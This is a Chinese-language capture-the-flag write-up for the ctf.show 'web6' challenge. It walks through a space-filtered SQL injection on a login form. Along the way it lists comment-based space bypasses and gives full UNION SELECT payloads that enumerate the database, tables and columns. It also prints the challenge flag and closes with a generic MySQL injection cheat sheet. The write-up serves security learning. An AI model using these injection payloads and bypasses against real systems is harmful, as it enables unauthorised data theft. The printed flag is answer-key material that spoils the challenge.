欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

ctf.show web6 sql注入过滤了空格

程序员文章站 2022-05-15 10:02:05
...

ctf.show web6 sql注入过滤了空格

开始的页面。是一个登录的页面
ctf.show web6 sql注入过滤了空格随便输入用户名和密码,没有报错之类的,就把账户名和密码都清空了
ctf.show web6 sql注入过滤了空格那就来burpsuit抓包
ctf.show web6 sql注入过滤了空格先用个万能密码 ’ or 1=1 #
ctf.show web6 sql注入过滤了空格这里提示sql注入错误,一般是有过滤,这里过滤了空格,绕过空格被过滤的可以用

/**/ ,(),`,tab,两个空格

这利我们用/**/代替空格
先判断有多少字段,先用4个测试一下,没有出现欢迎你的字样
ctf.show web6 sql注入过滤了空格那就用三个,测试成功
ctf.show web6 sql注入过滤了空格爆库
username=admin'/**/or/**/1=1/**/union/**/select/**/1,database(),3#&password=123
数据库为web2
ctf.show web6 sql注入过滤了空格爆表
username=admin'/**/or/**/1=1/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema="web2"#&password=123
ctf.show web6 sql注入过滤了空格爆字段
username=admin'/**/or/**/1=1/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name="flag"#&password=123
ctf.show web6 sql注入过滤了空格爆值
username=admin'/**/or/**/1=1/**/union/**/select/**/1,flag,3/**/from/**/flag#&password=123
ctf.show web6 sql注入过滤了空格flag{65d5206c-f153-42fc-8461-5a1737293ef9}

这里我总结一下,因为这里的数据库为mysql,爆库、爆表、爆字段、爆值都是那几条语句
爆库:

union select 1,2,3,database(); #   //这里得看有多少字段

爆表:

union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database(); #   

爆字段:

union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name="表名"; #   

爆值:

union select 1,2,3,字段 from 表名; #